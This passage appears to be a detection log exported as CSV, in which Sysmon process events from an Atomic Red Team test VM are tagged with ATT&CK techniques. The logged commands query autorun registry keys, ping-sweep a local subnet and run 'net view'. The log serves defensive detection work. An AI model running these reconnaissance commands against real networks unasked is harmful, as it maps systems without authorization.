<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.147861Z"">
</TimeCreated>
<EventRecordID>3707</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.113</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00102B773100</Data>
<Data Name=""ProcessId"">2148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.036329Z"">
</TimeCreated>
<EventRecordID>3705</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.019</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-001090723100</Data>
<Data Name=""ProcessId"">196</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.975133Z"">
</TimeCreated>
<EventRecordID>3703</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.956</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010056E3100</Data>
<Data Name=""ProcessId"">4220</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.921206Z"">
</TimeCreated>
<EventRecordID>3701</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.900</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107C693100</Data>
<Data Name=""ProcessId"">1740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.850894Z"">
</TimeCreated>
<EventRecordID>3699</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.842</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E1643100</Data>
<Data Name=""ProcessId"">5936</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.789067Z"">
</TimeCreated>
<EventRecordID>3697</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.775</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001056603100</Data>
<Data Name=""ProcessId"">6832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:35.014760Z"">
</TimeCreated>
<EventRecordID>3773</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:34.991</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-001091D13300</Data>
<Data Name=""ProcessId"">4528</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:34.797834Z"">
</TimeCreated>
<EventRecordID>3772</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:34.779</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-00100FCB3300</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
</TimeCreated>
<EventRecordID>3771</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
<Data Name=""ProcessId"">4684</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ParentProcessId"">1988</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
</TimeCreated>
<EventRecordID>3771</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
<Data Name=""ProcessId"">4684</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ParentProcessId"">1988</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
